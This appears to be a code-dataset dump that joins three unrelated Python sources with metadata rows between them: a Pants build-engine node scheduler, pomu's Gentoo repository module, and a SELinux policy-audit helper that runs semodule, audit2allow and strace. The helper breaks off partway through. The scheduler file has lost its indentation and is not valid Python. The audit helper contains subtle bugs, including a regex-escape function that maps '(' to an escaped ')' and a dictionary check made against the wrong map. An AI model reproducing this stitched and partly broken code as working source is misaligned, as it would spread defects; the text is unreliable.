# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from abc import abstractmethod, abstractproperty
from os.path import dirname
from pants.build_graph.address import Address
from pants.engine.addressable import parse_variants
from pants.engine.fs import (Dir, DirectoryListing, File, FileContent, Link, Path, ReadLink, Stats,
file_content, list_directory, path_stat, read_link)
from pants.engine.struct import HasStructs, Variants
from pants.util.meta import AbstractClass
from pants.util.objects import datatype
class ConflictingProducersError(Exception):
"""Indicates that there was more than one source of a product for a given subject.
TODO: This will need to be legal in order to support multiple Planners producing a
(mergeable) Classpath for one subject, for example. see:
https://github.com/pantsbuild/pants/issues/2526
"""
@classmethod
def create(cls, subject, product, matches):
"""Factory method to format the error message.
This is provided as a workaround to http://bugs.python.org/issue17296 to make this exception
picklable.
"""
msgs = '\n '.join('{}: {}'.format(k, v) for k, v in matches.items())
return ConflictingProducersError('More than one source of {} for {}:\n {}'
.format(product.__name__, subject, msgs))
def __init__(self, message):
super(ConflictingProducersError, self).__init__(message)
class State(object):
@classmethod
def raise_unrecognized(cls, state):
raise ValueError('Unrecognized Node State: {}'.format(state))
class Noop(datatype('Noop', ['msg']), State):
"""Indicates that a Node did not have the inputs which would be needed for it to execute."""
class Return(datatype('Return', ['value']), State):
"""Indicates that a Node successfully returned a value."""
class Throw(datatype('Throw', ['exc']), State):
"""Indicates that a Node should have been able to return a value, but failed."""
class Waiting(datatype('Waiting', ['dependencies']), State):
"""Indicates that a Node is waiting for some/all of the dependencies to become available.
Some Nodes will return different dependency Nodes based on where they are in their lifecycle,
but all returned dependencies are recorded for the lifetime of a ProductGraph.
"""
class Node(AbstractClass):
@classmethod
def validate_node(cls, node):
if not isinstance(node, Node):
raise ValueError('Value {} is not a Node.'.format(node))
@abstractproperty
def subject(self):
"""The subject for this Node."""
@abstractproperty
def product(self):
"""The output product for this Node."""
@abstractproperty
def variants(self):
"""The variants for this Node."""
@abstractproperty
def is_cacheable(self):
"""Whether node should be cached or not."""
@abstractmethod
def step(self, dependency_states, step_context):
"""Given a dict of the dependency States for this Node, returns the current State of the Node.
The NodeBuilder parameter provides a way to construct Nodes that require information about
installed tasks.
TODO: The NodeBuilder is now a StepContext... rename everywhere.
After this method returns a non-Waiting state, it will never be visited again for this Node.
TODO: Not all Node types actually need the `subject` as a parameter... can that be pushed out
as an explicit dependency type? Perhaps the "is-a/has-a" checks should be native outside of Node?
"""
class SelectNode(datatype('SelectNode', ['subject', 'product', 'variants', 'variant_key']), Node):
"""A Node that selects a product for a subject.
A Select can be satisfied by multiple sources, but fails if multiple sources produce a value. The
'variants' field represents variant configuration that is propagated to dependencies. When
a task needs to consume a product as configured by the variants map, it uses the SelectVariant
selector, which introduces the 'variant' value to restrict the names of values selected by a
SelectNode.
"""
@property
def is_cacheable(self):
return False
def _variants_node(self):
if type(self.subject) is Address and self.product is not Variants:
return SelectNode(self.subject, Variants, self.variants, None)
return None
def _select_literal(self, candidate, variant_value):
"""Looks for has-a or is-a relationships between the given value and the requested product.
Returns the resulting product value, or None if no match was made.
"""
def items():
# Check whether the subject is-a instance of the product.
yield candidate
# Else, check whether it has-a instance of the product.
if isinstance(candidate, HasStructs):
for subject in getattr(candidate, candidate.collection_field):
yield subject
# TODO: returning only the first literal configuration of a given type/variant. Need to
# define mergeability for products.
for item in items():
if not isinstance(item, self.product):
continue
if variant_value and not getattr(item, 'name', None) == variant_value:
continue
return item
return None
def step(self, dependency_states, step_context):
# Request default Variants for the subject, so that if there are any we can propagate
# them to task nodes.
variants = self.variants
variants_node = self._variants_node()
if variants_node:
dep_state = dependency_states.get(variants_node, None)
if dep_state is None or type(dep_state) == Waiting:
return Waiting([variants_node])
elif type(dep_state) == Return:
# A subject's variants are overridden by any dependent's requested variants, so
# we merge them left to right here.
variants = Variants.merge(dep_state.value.default.items(), variants)
# If there is a variant_key, see whether it has been configured.
variant_value = None
if self.variant_key:
variant_values = [value for key, value in variants
if key == self.variant_key] if variants else None
if not variant_values:
# Select cannot be satisfied: no variant configured for this key.
return Noop('Variant key {} was not configured in variants {}'.format(
self.variant_key, variants))
variant_value = variant_values[0]
# If the Subject "is a" or "has a" Product, then we're done.
literal_value = self._select_literal(self.subject, variant_value)
if literal_value is not None:
return Return(literal_value)
# Else, attempt to use a configured task to compute the value.
has_waiting_dep = False
dependencies = list(step_context.gen_nodes(self.subject, self.product, variants))
matches = {}
for dep in dependencies:
dep_state = dependency_states.get(dep, None)
if dep_state is None or type(dep_state) == Waiting:
has_waiting_dep = True
continue
elif type(dep_state) == Throw:
return dep_state
elif type(dep_state) == Noop:
continue
elif type(dep_state) != Return:
State.raise_unrecognized(dep_state)
# We computed a value: see whether we can use it.
literal_value = self._select_literal(dep_state.value, variant_value)
if literal_value is not None:
matches[dep] = literal_value
if has_waiting_dep:
return Waiting(dependencies)
elif len(matches) > 1:
# TODO: Multiple successful tasks are not currently supported. We should allow for this
# by adding support for "mergeable" products. see:
# https://github.com/pantsbuild/pants/issues/2526
return Throw(ConflictingProducersError.create(self.subject, self.product, matches))
elif len(matches) == 1:
return Return(matches.values()[0])
return Noop('No source of {}.'.format(self))
class DependenciesNode(datatype('DependenciesNode', ['subject', 'product', 'variants', 'dep_product', 'field']), Node):
"""A Node that selects the given Product for each of the items in a field `field` on this subject.
Begins by selecting the `dep_product` for the subject, and then selects a product for each
member a collection named `field` on the dep_product.
The value produced by this Node guarantees that the order of the provided values matches the
order of declaration in the list `field` of the `dep_product`.
"""
@property
def is_cacheable(self):
return False
def _dep_product_node(self):
return SelectNode(self.subject, self.dep_product, self.variants, None)
def _dependency_nodes(self, step_context, dep_product):
for dependency in getattr(dep_product, self.field or 'dependencies'):
variants = self.variants
if isinstance(dependency, Address):
# If a subject has literal variants for particular dependencies, they win over all else.
dependency, literal_variants = parse_variants(dependency)
variants = Variants.merge(variants, literal_variants)
yield SelectNode(dependency, self.product, variants, None)
def step(self, dependency_states, step_context):
# Request the product we need in order to request dependencies.
dep_product_node = self._dep_product_node()
dep_product_state = dependency_states.get(dep_product_node, None)
if dep_product_state is None or type(dep_product_state) == Waiting:
return Waiting([dep_product_node])
elif type(dep_product_state) == Throw:
return dep_product_state
elif type(dep_product_state) == Noop:
return Noop('Could not compute {} to determine dependencies.'.format(dep_product_node))
elif type(dep_product_state) != Return:
State.raise_unrecognized(dep_product_state)
# The product and its dependency list are available.
dependencies = list(self._dependency_nodes(step_context, dep_product_state.value))
for dependency in dependencies:
dep_state = dependency_states.get(dependency, None)
if dep_state is None or type(dep_state) == Waiting:
# One of the dependencies is not yet available. Indicate that we are waiting for all
# of them.
return Waiting([dep_product_node] + dependencies)
elif type(dep_state) == Throw:
return dep_state
elif type(dep_state) == Noop:
return Throw(ValueError('No source of explicit dependency {}'.format(dependency)))
elif type(dep_state) != Return:
raise State.raise_unrecognized(dep_state)
# All dependencies are present! Set our value to a list of the resulting values.
return Return([dependency_states[d].value for d in dependencies])
class ProjectionNode(datatype('ProjectionNode', ['subject', 'product', 'variants', 'projected_subject', 'fields', 'input_product']), Node):
"""A Node that selects the given input Product for the Subject, and then selects for a new subject.
TODO: This is semantically very similar to DependenciesNode (which might be considered to be a
multi-field projection for the contents of a list). Should be looking for ways to merge them.
"""
@property
def is_cacheable(self):
return False
def _input_node(self):
return SelectNode(self.subject, self.input_product, self.variants, None)
def _output_node(self, step_context, projected_subject):
return SelectNode(projected_subject, self.product, self.variants, None)
def step(self, dependency_states, step_context):
# Request the product we need to compute the subject.
input_node = self._input_node()
input_state = dependency_states.get(input_node, None)
if input_state is None or type(input_state) == Waiting:
return Waiting([input_node])
elif type(input_state) == Throw:
return input_state
elif type(input_state) == Noop:
return Noop('Could not compute {} in order to project its fields.'.format(input_node))
elif type(input_state) != Return:
State.raise_unrecognized(input_state)
# The input product is available: use it to construct the new Subject.
input_product = input_state.value
values = []
for field in self.fields:
values.append(getattr(input_product, field))
# If there was only one projected field and it is already of the correct type, project it.
if len(values) == 1 and type(values[0]) is self.projected_subject:
projected_subject = values[0]
else:
projected_subject = self.projected_subject(*values)
output_node = self._output_node(step_context, projected_subject)
# When the output node is available, return its result.
output_state = dependency_states.get(output_node, None)
if output_state is None or type(output_state) == Waiting:
return Waiting([input_node, output_node])
elif type(output_state) == Noop:
return Noop('Successfully projected, but no source of output product for {}.'.format(output_node))
elif type(output_state) in [Throw, Return]:
return output_state
else:
raise State.raise_unrecognized(output_state)
class TaskNode(datatype('TaskNode', ['subject', 'product', 'variants', 'func', 'clause']), Node):
@property
def is_cacheable(self):
return True
def step(self, dependency_states, step_context):
# Compute dependencies.
dep_values = []
dependencies = [step_context.select_node(selector, self.subject, self.variants)
for selector in self.clause]
# If all dependency Nodes are Return, execute the Node.
for dep_select, dep_key in zip(self.clause, dependencies):
dep_state = dependency_states.get(dep_key, None)
if dep_state is None or type(dep_state) == Waiting:
return Waiting(dependencies)
elif type(dep_state) == Return:
dep_values.append(dep_state.value)
elif type(dep_state) == Noop:
if dep_select.optional:
dep_values.append(None)
else:
return Noop('Was missing (at least) input {}.'.format(dep_key))
elif type(dep_state) == Throw:
return dep_state
else:
State.raise_unrecognized(dep_state)
try:
return Return(self.func(*dep_values))
except Exception as e:
return Throw(e)
def __repr__(self):
return 'TaskNode(subject={}, product={}, variants={}, func={}, clause={}'\
.format(self.subject, self.product, self.variants, self.func.__name__, self.clause)
def __str__(self):
return repr(self)
class FilesystemNode(datatype('FilesystemNode', ['subject', 'product', 'variants']), Node):
"""A native node type for filesystem operations."""
_FS_PAIRS = {
(DirectoryListing, Dir),
(FileContent, File),
(Stats, Path),
(ReadLink, Link),
}
_FS_PRODUCT_TYPES = {product for product, subject in _FS_PAIRS}
@classmethod
def is_filesystem_pair(cls, subject_type, product):
"""True if the given subject type and product type should be computed using a FileystemNode."""
return (product, subject_type) in cls._FS_PAIRS
@classmethod
def generate_subjects(self, filenames):
"""Given filenames, generate a set of subjects for invalidation predicate matching."""
for f in filenames:
# Stats, ReadLink, or FileContent for the literal path.
yield Path(f)
yield File(f)
yield Link(f)
# DirectoryListings for parent dirs.
yield Dir(dirname(f))
@property
def is_cacheable(self):
"""Native node should not be cached."""
return False
def step(self, dependency_states, step_context):
try:
if self.product is Stats:
return Return(path_stat(step_context.project_tree, self.subject))
elif self.product is FileContent:
return Return(file_content(step_context.project_tree, self.subject))
elif self.product is DirectoryListing:
return Return(list_directory(step_context.project_tree, self.subject))
elif self.product is ReadLink:
return Return(read_link(step_context.project_tree, self.subject))
else:
# This would be caused by a mismatch between _FS_PRODUCT_TYPES and the above switch.
raise ValueError('Mismatched input value {} for {}'.format(self.subject, self))
except Exception as e:
return Throw(e)
class StepContext(object):
"""Encapsulates external state and the details of creating Nodes.
This avoids giving Nodes direct access to the task list or subject set.
"""
def __init__(self, node_builder, project_tree):
self._node_builder = node_builder
self.project_tree = project_tree
def gen_nodes(self, subject, product, variants):
"""Yields Node instances which might be able to provide a value for the given inputs."""
return self._node_builder.gen_nodes(subject, product, variants)
def select_node(self, selector, subject, variants):
"""Constructs a Node for the given Selector and the given Subject/Variants."""
return self._node_builder.select_node(selector, subject, variants)
| apache-2.0 | 3,330,527,426,951,108,000 | 38.904429 | 139 | 0.691629 | false |
Hummer12007/pomu | pomu/repo/repo.py | 1 | 9456 | """Subroutines with repositories"""
from os import path, rmdir, makedirs
from shutil import copy2
from git import Repo
from patch import PatchSet
import portage
from pomu.package import Package, PatchList
from pomu.util.cache import cached
from pomu.util.fs import remove_file, strip_prefix
from pomu.util.result import Result
class Repository():
def __init__(self, root, name=None):
"""
Parameters:
root - root of the repository
name - name of the repository
"""
if not pomu_status(root):
raise ValueError('This path is not a valid pomu repository')
self.root = root
self.name = name
@property
def repo(self):
return Repo(self.root)
@property
def pomu_dir(self):
return path.join(self.root, 'metadata/pomu')
def merge(self, mergeable):
"""Merges a package or a patchset into the repository"""
if isinstance(mergeable, Package):
return self.merge_pkg(mergeable)
elif isinstance(mergeable, PatchList):
pkg = self.get_package(mergeable.name, mergeable.category,
mergeable.slot).unwrap()
return pkg.patch(mergeable.patches)
return Result.Err() #unreachable yet
def merge_pkg(self, package):
"""Merge a package (a pomu.package.Package package) into the repository"""
r = self.repo
pkgdir = path.join(self.pomu_dir, package.category, package.name)
if package.slot != '0':
pkgdir = path.join(pkgdir, package.slot)
package.merge_into(self.root).expect('Failed to merge package')
for wd, f in package.files:
r.index.add([path.join(wd, f)])
manifests = package.gen_manifests(self.root).expect()
for m in manifests:
r.index.add([m])
self.write_meta(pkgdir, package, manifests)
with open(path.join(self.pomu_dir, 'world'), 'a+') as f:
f.write('{}/{}'.format(package.category, package.name))
f.write('\n' if package.slot == '0' else ':{}\n'.format(package.slot))
r.index.add([path.join(self.pomu_dir, package.category, package.name)])
r.index.add([path.join(self.pomu_dir, 'world')])
r.index.commit('Merged package ' + package.name)
return Result.Ok('Merged package ' + package.name + ' successfully')
def write_meta(self, pkgdir, package, manifests):
"""
Write metadata for a Package object
Parameters:
pkgdir - destination directory
package - the package object
manifests - list of generated manifest files
"""
makedirs(pkgdir, exist_ok=True)
with open(path.join(pkgdir, 'FILES'), 'w+') as f:
for wd, fil in package.files:
f.write('{}/{}\n'.format(wd, fil))
for m in manifests:
f.write('{}\n'.format(strip_prefix(m, self.root)))
if package.patches:
patch_dir = path.join(pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
with open(path.join(pkgdir, 'PATCH_ORDER'), 'w') as f:
for patch in package.patches:
copy2(patch, patch_dir)
f.write(path.basename(patch) + '\n')
if package.backend:
with open(path.join(pkgdir, 'BACKEND'), 'w+') as f:
f.write('{}\n'.format(package.backend.__cname__))
package.backend.write_meta(pkgdir)
with open(path.join(pkgdir, 'VERSION'), 'w+') as f:
f.write(package.version)
def unmerge(self, package):
"""Remove a package (by contents) from the repository"""
r = self.repo
for wd, f in package.files:
dst = path.join(self.root, wd)
remove_file(r, path.join(dst, f))
try:
rmdir(dst)
except OSError: pass
pf = path.join(self.pomu_dir, package.name)
if path.isfile(pf):
remove_file(r, pf)
r.commit('Removed package ' + package.name + ' successfully')
return Result.Ok('Removed package ' + package.name + ' successfully')
def remove_package(self, name):
"""Remove a package (by name) from the repository"""
pkg = self.get_package(name).expect()
return self.unmerge(pkg)
def update_package(self, category, name, new):
"""Updates a package, replacing it by a newer version"""
pkg = self.get_package(category, name).expect()
self.unmerge(pkg).expect()
self.merge(new)
def _get_package(self, category, name, slot='0'):
"""Get an existing package (by category, name and slot), reading the manifest"""
from pomu.source import dispatcher
if slot == '0':
pkgdir = path.join(self.pomu_dir, category, name)
else:
pkgdir = path.join(self.pomu_dir, category, name, slot)
backend = None
if path.exists(path.join(pkgdir, 'BACKEND')):
with open(path.join(pkgdir, 'BACKEND'), 'r') as f:
bname = f.readline().strip()
backend = dispatcher.backends[bname].from_meta_dir(pkgdir)
if backend.is_err():
return backend
backend = backend.ok()
with open(path.join(pkgdir, 'VERSION'), 'r') as f:
version = f.readline().strip()
with open(path.join(pkgdir, 'FILES'), 'r') as f:
files = [x.strip() for x in f]
patches=[]
if path.isfile(path.join(pkgdir, 'PATCH_ORDER')):
with open(path.join(pkgdir, 'PATCH_ORDER'), 'r') as f:
patches = [x.strip() for x in f]
pkg = Package(name, self.root, backend, category=category, version=version, slot=slot, files=files, patches=[path.join(pkgdir, 'patches', x) for x in patches])
pkg.__class__ = MergedPackage
return Result.Ok(pkg)
def get_package(self, name, category=None, slot=None):
"""Get a package by name, category and slot"""
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
for spec in f:
spec = spec.strip()
cat, _, nam = spec.partition('/')
nam, _, slo = nam.partition(':')
if (not category or category == cat) and nam == name:
if not slot or (slot == '0' and not slo) or slot == slo:
return self._get_package(category, name, slot or '0')
return Result.Err('Package not found')
def get_packages(self):
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
def portage_repos():
"""Yield the repositories configured for portage"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
for repo in rsets.prepos_order:
yield repo
def portage_repo_path(repo):
"""Get the path of a given portage repository (repo)"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
if repo in rsets.prepos:
return rsets.prepos[repo].location
return None
def pomu_status(repo_path):
"""Check if pomu is enabled for a repository at a given path (repo_path)"""
return path.isdir(path.join(repo_path, 'metadata', 'pomu'))
def pomu_active_portage_repo():
"""Returns a portage repo, for which pomu is enabled"""
for repo in portage_repos():
if pomu_status(portage_repo_path(repo)):
return repo
return None
@cached
def pomu_active_repo(no_portage=None, repo_path=None):
"""Returns a repo for which pomu is enabled"""
if no_portage:
if not repo_path:
return Result.Err('repo-path required')
if pomu_status(repo_path):
return Result.Ok(Repository(repo_path))
return Result.Err('pomu is not initialized')
else:
repo = pomu_active_portage_repo()
if repo:
return Result.Ok(Repository(portage_repo_path(repo), repo))
return Result.Err('pomu is not initialized')
class MergedPackage(Package):
@property
def pkgdir(self):
ret = path.join(self.root, 'metadata', 'pomu', self.category, self.name)
if self.slot != '0':
ret = path.join(ret, self.slot)
return ret
def patch(self, patch):
if isinstance(patch, list):
for x in patch:
self.patch(x)
return Result.Ok()
ps = PatchSet()
ps.parse(open(patch, 'r'))
ps.apply(root=self.root)
self.add_patch(patch)
return Result.Ok()
@property
def patch_list(self):
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
def add_patch(self, patch, name=None): # patch is a path, unless name is passed
patch_dir = path.join(self.pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
if name is None:
copy2(patch, patch_dir)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(path.basename(patch) + '\n')
else:
with open(path.join(patch_dir, name), 'w') as f:
f.write(patch)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(name + '\n')
| gpl-2.0 | 5,766,960,781,250,393,000 | 38.07438 | 167 | 0.579315 | false |
Siosm/contextd-capture | piga-systrans/selaudit/selaudit.py | 2 | 25513 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Configuration
# Templates
basepolname = 'template/module'
base_transpol_name = 'template/temp_transition'
makefile_path = 'template/Makefile'
# Default value for the template variables
user_u_default = 'user_u'
user_r_default = 'user_r'
user_t_default = 'user_t'
module_domain_t_default_pattern = 'user_%modulename%_t'
module_exec_t_default_pattern = '%modulename%_exec_t'
module_tmp_domain_t_default_pattern = '%modulename%_tmp_t'
module_log_domain_t_default_pattern = '%modulename%_log_t'
# Selpolgen user
selpolgen_u_default = 'root'
selpolgen_r_default = 'sysadm_r'
selpolgen_t_default = 'sysadm_t'
# Programs fullpath
semodule_path = '/usr/sbin/semodule'
make_path = '/usr/bin/make'
setfilecon_path = '/usr/sbin/setfilecon'
runcon_path = '/usr/bin/runcon'
audit2allow_path = '/usr/bin/audit2allow'
dmesg_path = '/bin/dmesg'
strace_path = '/usr/bin/strace'
ls_path = '/bin/ls'
setfiles_path = '/sbin/setfiles'
# /Configuration
# Import
import getopt
import re, string, sys
import os, signal
import glob
import subprocess
import shutil
import time
from pigi import *
# Global variables
verbosity = 0
wantToAbort = False
# functions
def log(priority, msg):
if priority <= verbosity:
print(msg)
def handler(signum, frame):
global wantToAbort
wantToAbort = True
def mkdir_p(path):
if not os.path.exists (path):
os.makedirs (path)
def getPolicyPath(module_name, extension=''):
if len(extension) > 0:
return "policies/%s/%s.%s" % (module_name, module_name, extension)
else:
return "policies/%s/" % module_name
def getTempModuleTransitionPath(module_name, extension=''):
if len(extension) > 0:
return "temp/%s/%s.%s" % (module_name, module_name, extension)
else:
return "temp/%s/" % module_name
def loadSELinuxModule(module_path_pp):
proc = subprocess.Popen([semodule_path, '-i', module_path_pp], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while loading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_path_pp, stdout, stderr), file=sys.stderr)
return False
else:
return True
def unloadSELinuxModule(module_name):
proc = subprocess.Popen([semodule_path, '-r', module_name], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while unloading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_name, stdout, stderr), file=sys.stderr)
return False
else:
return True
def reloadSELinuxModule(module_name):
if unloadSELinuxModule(module_name):
if loadSELinuxModule(getPolicyPath(module_name, "pp")):
return True
else:
return False
else:
return False
def compileAndLoadSELinuxModule(module_dir):
proc = subprocess.Popen([make_path, 'load'], cwd=module_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while compiling and loading the module at '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_dir, stdout, stderr), file=sys.stderr)
return False
else:
return True
def generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, permissive_mode=False):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
# Get the template
template_te = open("%s.te" % basepolname, "r").read()
template_if = open("%s.if" % basepolname, "r").read()
template_fc = open("%s.fc" % basepolname, "r").read()
if len(template_te) == 0:
return ''
if permissive_mode:
template_te += "permissive ${module_domain_t};"
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_tmp_domain_t": module_tmp_domain_t, "module_log_domain_t": module_log_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Create a directory for the output module
mkdir_p(getPolicyPath(module_name, ""))
# write the output module there
file_te = open(getPolicyPath(module_name, "te"), "w").write(template_te)
file_if = open(getPolicyPath(module_name, "if"), "w").write(template_if)
file_fc = open(getPolicyPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getPolicyPath(module_name, ""))
return getPolicyPath(module_name)
def generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
module_name = "selpolgen-%s" % module_name
# Get the template
template_te = open("%s.te" % base_transpol_name, "r").read()
template_if = open("%s.if" % base_transpol_name, "r").read()
template_fc = open("%s.fc" % base_transpol_name, "r").read()
if len(template_te) == 0:
return ''
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Remove the directory for the output module
try:
shutil.rmtree(getTempModuleTransitionPath(module_name, ""))
except:
pass
# Create a directory for the output module
mkdir_p(getTempModuleTransitionPath(module_name, ""))
# write the output module there
file_te = open(getTempModuleTransitionPath(module_name, "te"), "w").write(template_te)
file_if = open(getTempModuleTransitionPath(module_name, "if"), "w").write(template_if)
file_fc = open(getTempModuleTransitionPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getTempModuleTransitionPath(module_name, ""))
return getTempModuleTransitionPath(module_name)
def setFileSELinuxContext(user_u, role_r, type_t, filepath):
context = '%s:%s:%s' % (user_u, role_r, type_t)
proc = subprocess.Popen([setfilecon_path, context, filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while setting the context %s to the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (context, filepath, stdout, stderr), file=sys.stderr)
return False
else:
return True
def getAudit2AllowRules(domain_t):
rules = []
proc = subprocess.Popen([audit2allow_path, "-d"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while auditing:\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (stdout, stderr), file=sys.stderr)
return rules
lines=stdout.splitlines()
log(2, "audit2allow output (%i lines) is: '%s'" % (len(lines), stdout))
store=False
for line in lines:
line = line.decode()
log(2, "line[:10] = '%s'" % (line[:10]))
if line[:10] == "#=========":
fields=line.split(" ")
if fields[1] == domain_t:
store = True
else:
store = False
else:
if store and len(line)>0:
rules.append(line);
return rules
def regeneratePolicy(policy_path, rules, permissive_domains = list()):
# Add the lines to the policy
template_te = open(policy_path, "a");
#template_te.writelines(rules)
for line in rules:
template_te.write(line+"\n")
template_te.close()
# Parse it
scanner = SELinuxScanner()
parser = SELinuxParser(scanner)
te_file = open(policy_path, "r")
tokens = parser.parse(te_file.read())
te_file.close()
# Store it optimized
optimizer = SELinuxOptimizer(tokens)
optimizer.selfize_rules()
optimizer.factorize_rules()
optimizer.factorize_rule_attributes()
optimizer.sort_rules()
optimizer.to_file(policy_path, permissive_domains)
def updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=False):
log(1, "Read the audit2allow output")
rules = getAudit2AllowRules(module_domain_t)
if forceReload or len(rules) > 0:
log(0, "Add %i rules to %s and reload the policy" % (len(rules), getPolicyPath(module_name, "te")))
if not enforcingMode:
permissive_domains = [module_domain_t]
else:
permissive_domains = list()
regeneratePolicy(getPolicyPath(module_name, "te"), rules, permissive_domains)
# empty the logs
dmesg = subprocess.Popen([dmesg_path, '-c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
dmesg.communicate()
# Load the new policy
compileAndLoadSELinuxModule(getPolicyPath(module_name, ""))
return len(rules)
def runApp(module_name, app_path, useStrace=False):
if useStrace and os.path.exists(strace_path):
print("Launch the application and trace it with strace")
proc = subprocess.Popen([strace_path, '-e' 'trace=open,execve,mkdir', '-o', "%sstrace" % getTempModuleTransitionPath("selpolgen-%s" % module_name, ""), '-ff', '-F', app_path])
else:
print("Launch the application")
proc = subprocess.Popen([app_path])
# get the pid
curPID = proc.pid
return proc
def askToRunApp(app_path, domain_t, audit_fc=False):
deleteFileList(["/tmp/selinux-audit"])
print("\n****** Entering the auditing loop ******")
if audit_fc:
print("The application you are auditing will first be launched in a permissive mode, be sure to use all the functionnalities before quitting it.\n")
print("Please launch this command in the domain %s: %s" % (domain_t, "selaudit_user.sh %s" % app_path))
def getFileCon(filepath):
proc = subprocess.Popen([ls_path, '-Z', filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
# print("Error while getting the context of the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (filepath, stdout, stderr), file=sys.stderr)
return "<Context not found>"
fields = str(stdout, "utf-8").split(' ')
log(2, "getFileCon('%s') = '%s'" % (filepath, fields[0]))
return fields[0]
def deleteFileList(to_be_deleted):
for f in to_be_deleted:
try:
if os.path.isfile(f) or os.path.islink(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
except Exception as inst:
print("deleteFileList: Caught exception %s: %s" % (type(inst), inst))
pass
def escape_re(re):
re = re.replace(".", "\\.");
re = re.replace("(", "\\)");
re = re.replace(")", "\\)");
re = re.replace("|", "\\|");
re = re.replace("^", "\\^");
re = re.replace("*", "\\*");
re = re.replace("+", "\\+");
re = re.replace("?", "\\?");
return re
def auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=True):
# dir_path = getTempModuleTransitionPath("selpolgen-%s" % module_name, "")
execves = dict()
mkdirs = dict()
opens = dict()
libs = dict()
shms = dict()
failed = list()
to_be_deleted = list()
# Read all the logs
log_files = glob.glob("%s/strace*" % dir_path)
for log in log_files:
f = open(log, "r")
for line in f:
m = re.match(r"(?P<function>\w+) *\((?P<params>.*)\) *= *(?P<result>.*)", line)
if m:
args = m.group('params').split(', ')
if not m.group('result').startswith("-1"):
line = "%s(%s)" % (m.group('function'), ','.join(args))
m2 = re.match(r"\"(.*)\"", args[0])
if m2:
filepath = m2.group(1)
if m.group('function') == "open":
if args[1].find('O_CREAT') != -1 or args[1].find('O_WRONLY') != -1:
to_be_deleted.append(filepath)
# Is the file a standard library ?
stdlib = re.match(r"/(usr/)?lib/[^/]+", filepath)
if filepath.startswith('/dev/shm'):
if filepath not in shms:
shms[filepath] = list()
if line not in shms[filepath]:
shms[filepath].append(line)
elif stdlib:
if filepath not in opens:
libs[filepath] = list()
if line not in libs[filepath]:
libs[filepath].append(line)
else:
if filepath not in opens:
opens[filepath] = list()
if line not in opens[filepath]:
opens[filepath].append(line)
elif m.group('function') == "mkdir":
if filepath not in mkdirs:
mkdirs[filepath] = list()
if line not in mkdirs[filepath]:
mkdirs[filepath].append(line)
to_be_deleted.append(filepath)
elif m.group('function') == "execve":
if filepath not in execves:
execves[filepath] = list()
if line not in execves[filepath]:
execves[filepath].append(line)
else:
line = "%s(%s)" % (m.group('function'), ','.join(args))
f.close()
# Delete all the strace files
deleteFileList(log_files);
if saveResults:
# We have the logs, sorted by type and by path, generate the output file
fc_file = open(getPolicyPath(module_name, "fc"), "a")
fc_file.write("\n\n\n# **** Mkdir ****\n")
mkdir_keys = mkdirs.keys()
for dir_path in sorted(mkdir_keys):
# Write all the interactions with this file
for call in mkdirs[dir_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s/(.*/)? %s\n\n" % (escape_re(dir_path), getFileCon(dir_path)))
